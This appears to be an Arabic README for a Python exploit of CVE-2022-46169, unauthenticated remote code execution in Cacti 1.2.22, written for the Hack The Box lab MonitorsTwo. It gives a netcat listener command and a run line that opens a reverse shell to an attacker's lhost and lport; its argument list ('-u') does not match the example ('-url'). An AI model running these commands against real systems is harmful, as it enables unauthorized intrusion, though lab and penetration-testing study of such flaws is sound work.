
استغلال بايثون لـ CVE-2022-46169 ينفذ تنفيذ كود عن بعد غير مصادق عليه على Cacti إصدار 1.2.22 عبر شل عكسي، مخصص لاختبار الاختراق التعليمي.
يحتوي هذا المستودع على استغلال لـ CVE-2022-46169، والذي يؤثر على Cacti 1.2.22. تسمح هذه الثغرة لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر.
إذا كنت تريد شرحاً مفصلاً لكيفية عمل هذا الاستغلال، فيرجى الرجوع إلى هذا المنشور من Rapid7. يقدمون تفاصيل كبيرة حول الخصوصيات.
لقد كتبت هذا الكود بمساعدة من chatGPT لجهاز Hack The Box يُدعى MonitorsTwo لأغراض تعليمية.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
قم بإعداد مستمع على جهازك المحلي باستخدام netcat nc -lvnp 9001
شغل الاستغلال ضد الهدف
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
هذا الدليل الإثباتي (PoC) مخصص فقط للأغراض التعليمية والاختبارية. استخدام هذا الدليل الإثباتي على أي نظام أو شبكة دون إذن صريح من مالك النظام غير قانوني وقد يؤدي إلى إجراءات قانونية. لا يتحمل المنشئ أي مسؤولية عن أي ضرر ناتج عن الاستخدام الصحيح أو غير الصحيح لهذا الدليل الإثباتي. استخدم على مسؤوليتك الخاصة.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/